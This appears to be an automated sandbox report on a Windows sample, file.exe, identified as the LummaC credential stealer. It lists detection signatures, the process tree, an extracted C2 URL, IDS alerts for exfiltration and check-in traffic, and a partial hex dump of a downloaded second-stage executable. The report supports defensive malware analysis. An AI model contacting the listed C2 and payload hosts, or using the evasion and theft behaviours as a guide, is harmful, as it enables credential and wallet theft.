Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561629
MD5:89a84eb8a83e3072365849af60f40dcc
SHA1:0d22977f6a49a60619e8fca8297ef92cab0ce52c
SHA256:6e05eacb5ba89bf57cbe21ea64b9e8fb72148ecc6624c55e1f82aa2efcee03d6
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6088 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 89A84EB8A83E3072365849AF60F40DCC)
    • chrome.exe (PID: 3224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 --field-trial-handle=2332,i,7438478652651464284,9822841454251947196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,12934382445748236653,13668332504761590760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 6088JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 6088JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 6088JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T02:13:03.585272+010020283713Unknown Traffic192.168.2.549704104.21.33.116443TCP
          2024-11-24T02:13:05.694365+010020283713Unknown Traffic192.168.2.549705104.21.33.116443TCP
          2024-11-24T02:13:07.982795+010020283713Unknown Traffic192.168.2.549706104.21.33.116443TCP
          2024-11-24T02:13:10.360481+010020283713Unknown Traffic192.168.2.549707104.21.33.116443TCP
          2024-11-24T02:13:12.849857+010020283713Unknown Traffic192.168.2.549708104.21.33.116443TCP
          2024-11-24T02:13:15.676940+010020283713Unknown Traffic192.168.2.549709104.21.33.116443TCP
          2024-11-24T02:13:18.347379+010020283713Unknown Traffic192.168.2.549712104.21.33.116443TCP
          2024-11-24T02:13:23.494801+010020283713Unknown Traffic192.168.2.549723104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T02:13:04.287887+010020546531A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
          2024-11-24T02:13:06.391065+010020546531A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
          2024-11-24T02:13:24.196379+010020546531A Network Trojan was detected192.168.2.549723104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T02:13:04.287887+010020498361A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T02:13:06.391065+010020498121A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T02:13:25.754001+010020197142Potentially Bad Traffic192.168.2.549729185.215.113.1680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T02:13:08.954480+010020480941Malware Command and Control Activity Detected192.168.2.549706104.21.33.116443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exeAvira: detected
          Source: file.exe.6088.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
          Source: file.exeVirustotal: Detection: 41%Perma Link
          Source: file.exeJoe Sandbox ML: detected
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.5:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.5:49790 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49851 version: TLS 1.2
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2364593718.0000000007D10000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2453060574.0000000005DD2000.00000040.00000800.00020000.00000000.sdmp

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49723 -> 104.21.33.116:443
          Source: Malware configuration extractorURLs: https://property-imper.sbs/api
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 01:13:25 GMTContent-Type: application/octet-streamContent-Length: 2832384Last-Modified: Sun, 24 Nov 2024 00:56:48 GMTConnection: keep-aliveETag: "674279d0-2b3800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 1a da 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 71 77 66 7a 77 6f 62 00 e0 2a 00 00 a0 00 00 00 d8 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6c 63 66 70 72 6a 6d 00 20 00 00 00 80 2b 00 00 04 00 00 00 12 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 16 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49729 -> 185.215.113.16:80
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=r+aWDcu63agkNoh&MD=V16GSvzv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
